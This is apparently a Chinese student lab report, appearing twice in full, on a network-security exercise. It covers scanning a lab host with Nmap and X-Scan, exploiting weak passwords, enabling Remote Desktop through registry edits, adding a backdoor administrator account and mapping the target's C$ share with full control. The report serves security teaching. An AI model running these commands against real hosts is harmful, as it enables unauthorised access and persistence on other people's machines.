网络安全实验报告
学号: 姓名: 班级:
实验项目编号: B031120502 实验项目名称: 网络分析工具软件的使用
一、实验目的:
1. 会使用工具查找主机漏洞
2. 学会对弱口令的利用
3. 了解开启主机默认共享以及在命令提示下开启服务的方法
4. 通过实验了解如何提高主机的安全性
二、实验环境:
网络安全实验平台(装有windows 、 linux 等多个系统虚拟机及相应软件)
三、实验原理(或要求):
实验原理如图:
四、实验步骤:
(1)主机A 点击工具栏“Nmap”按钮,启动Nmap 工具,输入命令:nmap -T4 -A -v -PE -PS22,25,80 -PA21,23,80,3389 172.16.0.160,开始扫描。
(2) 主机A 点击工具栏“X-Scan ”按钮启动X-Scan ,点击菜单栏中的“设置”按钮,在弹出菜单中点击“扫描参数”,在“检测范围”中填写主机B 的IP ,展开左侧树状接口中的“全局设置”在“扫描模块”选项中分别勾选“开放服务”、“NT-Server 弱口令”、“NetBios 信息”三个选项,其它选项为空,点击“确定”按钮,完成扫描参数设定。
(3) 主机A 点击
开始进行扫描。扫描结束后,自动弹出检测报告。
(4)主机A 点击工具栏中“远程桌面”按钮,打开远程桌面连接,尝试登录主机B ,在远程桌面中输入主机B 的IP ,点击“连接”按钮.
(5) 通过修改注册表开启主机B 远程桌面:
①主机A 登录成功后在命令提示符下执行“reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" ”查看执行结果.
②主机A 在命令提示符下执行“reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections ”,删除该键值,
③主机A 新建一个fDenyTSConnections 值为0的注册表项,在命令提示符下执行“reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0”确定,操作成功
(6)建立新用户
①主机A 再次使用“test ”账户用“telnet ”命令登录主机B ,并在命令提示符下执行“net user myadmin 1234 /add”,“myadmin ”为用户名,“1234”为密码。
②主机A 将myadmin 用户添加到administrators 组中,在命令提示符下执行“net localgroup administrators myadmin /add”。
③主机A 使用“myadmin ”账户远程桌面登录主机B ,查看效果。
(7)添加磁盘映射
①主机A 使用“myadmin ”账户telnet 登录主机B ,在命令提示符下输入“net share c$=c: /grant:myadmin,full”。将主机B 中的C 盘映射为c$,并赋予完全控制权限.
②主机A 退出telnent ,并与主机B 建立ipc 连接,主机A 在命令提示符下输入“net use \\主机B 的IP\ipc$ "1234" /user:"myadmin"”
③主机A 继续执行命令“net use y: \\172.16.0.160\c$”将主机B 开放的默认共享C 盘映射为自己的本地磁盘Y ,如图2-2-12所示,这样,操作自己的Y 盘就是操作主机B 的C 盘。
④主机A 打开“我的电脑”查看新增加的网络驱动器Y 盘,并尝试对Y 盘的文件进行增、删、改操作。
五、实验记录或结果
发现安全漏洞:
弱口令:
由于主机B 没有开启远程桌面的服务,结果出现了“客户端无法连接到远程计算机”的提示,远程登录失败。
通过修改注册表开启主机B 远程桌面:
添加磁盘映射:
六、思考题:
寻找攻击目标的一般方法有哪些(至少说出三种)。
1. 开放来源信息;
2. 攻击者会对一个域名执行whois 程序以找到附加的信息;
3. 找到附加IP 地址的一个方法是对一个特定域询问DNS 。
网络安全实验报告
学号: 姓名: 班级:
实验项目编号: B031120502 实验项目名称: 网络分析工具软件的使用
一、实验目的:
1. 会使用工具查找主机漏洞
2. 学会对弱口令的利用
3. 了解开启主机默认共享以及在命令提示下开启服务的方法
4. 通过实验了解如何提高主机的安全性
二、实验环境:
网络安全实验平台(装有windows 、 linux 等多个系统虚拟机及相应软件)
三、实验原理(或要求):
实验原理如图:
四、实验步骤:
(1)主机A 点击工具栏“Nmap”按钮,启动Nmap 工具,输入命令:nmap -T4 -A -v -PE -PS22,25,80 -PA21,23,80,3389 172.16.0.160,开始扫描。
(2) 主机A 点击工具栏“X-Scan ”按钮启动X-Scan ,点击菜单栏中的“设置”按钮,在弹出菜单中点击“扫描参数”,在“检测范围”中填写主机B 的IP ,展开左侧树状接口中的“全局设置”在“扫描模块”选项中分别勾选“开放服务”、“NT-Server 弱口令”、“NetBios 信息”三个选项,其它选项为空,点击“确定”按钮,完成扫描参数设定。
(3) 主机A 点击
开始进行扫描。扫描结束后,自动弹出检测报告。
(4)主机A 点击工具栏中“远程桌面”按钮,打开远程桌面连接,尝试登录主机B ,在远程桌面中输入主机B 的IP ,点击“连接”按钮.
(5) 通过修改注册表开启主机B 远程桌面:
①主机A 登录成功后在命令提示符下执行“reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" ”查看执行结果.
②主机A 在命令提示符下执行“reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections ”,删除该键值,
③主机A 新建一个fDenyTSConnections 值为0的注册表项,在命令提示符下执行“reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0”确定,操作成功
(6)建立新用户
①主机A 再次使用“test ”账户用“telnet ”命令登录主机B ,并在命令提示符下执行“net user myadmin 1234 /add”,“myadmin ”为用户名,“1234”为密码。
②主机A 将myadmin 用户添加到administrators 组中,在命令提示符下执行“net localgroup administrators myadmin /add”。
③主机A 使用“myadmin ”账户远程桌面登录主机B ,查看效果。
(7)添加磁盘映射
①主机A 使用“myadmin ”账户telnet 登录主机B ,在命令提示符下输入“net share c$=c: /grant:myadmin,full”。将主机B 中的C 盘映射为c$,并赋予完全控制权限.
②主机A 退出telnent ,并与主机B 建立ipc 连接,主机A 在命令提示符下输入“net use \\主机B 的IP\ipc$ "1234" /user:"myadmin"”
③主机A 继续执行命令“net use y: \\172.16.0.160\c$”将主机B 开放的默认共享C 盘映射为自己的本地磁盘Y ,如图2-2-12所示,这样,操作自己的Y 盘就是操作主机B 的C 盘。
④主机A 打开“我的电脑”查看新增加的网络驱动器Y 盘,并尝试对Y 盘的文件进行增、删、改操作。
五、实验记录或结果
发现安全漏洞:
弱口令:
由于主机B 没有开启远程桌面的服务,结果出现了“客户端无法连接到远程计算机”的提示,远程登录失败。
通过修改注册表开启主机B 远程桌面:
添加磁盘映射:
六、思考题:
寻找攻击目标的一般方法有哪些(至少说出三种)。
1. 开放来源信息;
2. 攻击者会对一个域名执行whois 程序以找到附加的信息;
3. 找到附加IP 地址的一个方法是对一个特定域询问DNS 。